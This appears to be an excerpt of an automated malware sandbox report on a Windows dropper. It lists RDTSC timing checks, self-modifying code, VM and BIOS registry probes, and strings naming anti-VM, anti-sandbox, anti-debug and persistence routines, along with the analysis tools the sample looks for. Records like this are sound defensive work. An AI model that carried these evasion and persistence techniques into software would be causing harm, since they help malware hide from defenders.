Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1712AE5 second address: 1712AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171A91F second address: 171A925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171A925 second address: 171A929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171A929 second address: 171A931 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171AA98 second address: 171AA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171AF0B second address: 171AF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171B056 second address: 171B083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C039A7h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2274C0399Dh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171B2F5 second address: 171B2FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171B2FB second address: 171B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2274C039A6h 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F2274C03996h 0x00000014 popad 0x00000015 pop ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171B326 second address: 171B331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171B331 second address: 171B335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171B335 second address: 171B33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 171B33E second address: 171B34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jnc 00007F2274C0399Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1724E1E second address: 1724E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F22757AEC1Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1724E2D second address: 1724E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 172370B second address: 172372A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC23h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 172372A second address: 172372E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 172372E second address: 172374A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F22757AEC1Ch 0x0000000e js 00007F22757AEC16h 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F22757AEC16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1723F13 second address: 1723F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F2274C0399Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F2274C039A0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1723F38 second address: 1723F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1724480 second address: 172449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2274C03996h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushad 0x00000014 jnp 00007F2274C03996h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 172A91E second address: 172A931 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F22757AEC1Ah 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 172A3C1 second address: 172A3E3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2274C039AAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 172A3E3 second address: 172A3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 172A3E7 second address: 172A3EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1736FC2 second address: 1736FE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC23h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1739E8A second address: 1739E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1739ABB second address: 1739AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1739AC1 second address: 1739AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1739AC7 second address: 1739ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 174714E second address: 174717F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F2274C0399Ah 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F2274C039A2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F2274C03996h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1746FD3 second address: 1746FEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F22757AEC1Bh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jno 00007F22757AEC16h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1752D12 second address: 1752D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1752D18 second address: 1752D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1752D1E second address: 1752D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F2274C03996h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751A51 second address: 1751A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751A58 second address: 1751AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F2274C039A0h 0x0000000d jnc 00007F2274C039B1h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F2274C03996h 0x0000001b jmp 00007F2274C0399Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751D83 second address: 1751DCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F22757AEC1Fh 0x0000000c jng 00007F22757AEC16h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jmp 00007F22757AEC1Bh 0x0000001f jbe 00007F22757AEC16h 0x00000025 push eax 0x00000026 pop eax 0x00000027 js 00007F22757AEC16h 0x0000002d popad 0x0000002e popad 0x0000002f js 00007F22757AEC2Ah 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751DCC second address: 1751DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751DD2 second address: 1751DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751F13 second address: 1751F79 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2274C039A9h 0x00000008 jmp 00007F2274C039A1h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jmp 00007F2274C039A1h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jmp 00007F2274C039A6h 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751F79 second address: 1751F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1751F7F second address: 1751F85 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17556D5 second address: 17556FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F22757AEC28h 0x00000009 pop eax 0x0000000a jp 00007F22757AEC1Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17556FA second address: 1755705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1755705 second address: 175570B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 176DBFB second address: 176DC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1773586 second address: 17735A5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F22757AEC2Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1777FD4 second address: 1777FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C039A0h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177BFE1 second address: 177BFF0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F22757AEC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177BFF0 second address: 177BFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA10 second address: 177CA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA14 second address: 177CA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA18 second address: 177CA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA21 second address: 177CA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2274C03996h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA2C second address: 177CA33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA33 second address: 177CA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA3E second address: 177CA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177CA42 second address: 177CA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1784061 second address: 1784067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1784067 second address: 178406B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 178406B second address: 178406F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 178406F second address: 1784079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1788A6A second address: 1788A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F22757AEC1Ch 0x00000009 popad 0x0000000a jmp 00007F22757AEC1Fh 0x0000000f push edi 0x00000010 jns 00007F22757AEC16h 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F22757AEC16h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 17811FF second address: 1781205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177FE1A second address: 177FE1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177FE1F second address: 177FE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jc 00007F2274C0399Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 177FE2F second address: 177FE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F22757AEC22h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A0478 second address: 16A0483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2274C03996h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A067B second address: 16A0681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16A0681 second address: 16A0685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Special instruction interceptor: First address: 14ED88E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Special instruction interceptor: First address: 14ED96B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Special instruction interceptor: First address: 14EB512 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Special instruction interceptor: First address: 1730535 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Memory allocated: 59B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Memory allocated: 5B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Memory allocated: 7B40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe TID: 7448

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: E205fJJS1Q.exe, E205fJJS1Q.exe, 00000000.00000002.1716041787.0000000001676000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: E205fJJS1Q.exe, 00000000.00000003.1673592712.0000000005820000.00000004.00001000.00020000.00000000.sdmp, E205fJJS1Q.exe, 00000000.00000002.1715411597.0000000000E12000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>ladddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladddadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksiujwdkvbji0.resources
Source: E205fJJS1Q.exe, 00000000.00000002.1716464048.00000000019EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: E205fJJS1Q.exe, 00000000.00000002.1715411597.0000000000E12000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: E205fJJS1Q.exe, E205fJJS1Q.exe, 00000000.00000003.1673592712.0000000005820000.00000004.00001000.00020000.00000000.sdmp, E205fJJS1Q.exe, 00000000.00000002.1715411597.0000000000E12000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000002.00000003.1720941817.00000000001A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
